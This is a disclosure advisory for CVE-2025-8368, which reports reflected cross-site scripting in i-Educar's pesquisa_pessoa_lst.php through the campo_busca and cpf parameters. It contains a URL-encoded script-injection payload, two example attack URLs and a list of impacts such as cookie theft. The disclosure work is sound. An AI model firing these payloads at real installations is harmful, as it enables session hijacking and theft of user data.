CVE-2025-8368: Multiples Cross-Site Scripting (XSS) Reflected in endpoint pesquisa_pessoa_lst.php

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-8368

Summary

Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the pesquisa_pessoa_lst.php endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the campo_busca and cpf parameters.

Details

Vulnerable Endpoint: pesquisa_pessoa_lst.php

Parameters: campo_busca and cpf

PoC

Payload:

1

  %22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E

This payload can be injected into either of the two parameters. Example attack URLs:

Parameter campo_busca

1

  /intranet/pesquisa_pessoa_lst.php?campo_busca=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E

Parameter cpf

1

  /intranet/pesquisa_pessoa_lst.php?cpf=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E

Impact

• Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.
• Downloading malware: Attackers can trick users into downloading and installing malware on their computers.
• Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.
• Stealing credentials: Attackers can steal a user's credentials.
• Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.
• Defacing websites: Attackers can deface a website by altering its content.
• Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.
• Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.

Reference

https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8368.md

Finder

Marcelo Queiroz

By: CVE-Hunters